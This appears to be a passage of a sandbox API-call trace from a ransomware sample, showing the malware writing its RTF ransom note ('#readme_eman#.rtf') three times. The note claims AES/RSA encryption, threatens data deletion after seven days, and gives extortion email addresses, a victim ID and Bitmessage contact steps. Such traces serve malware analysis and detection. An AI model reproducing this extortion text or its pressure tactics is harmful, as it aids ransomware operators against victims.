data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn 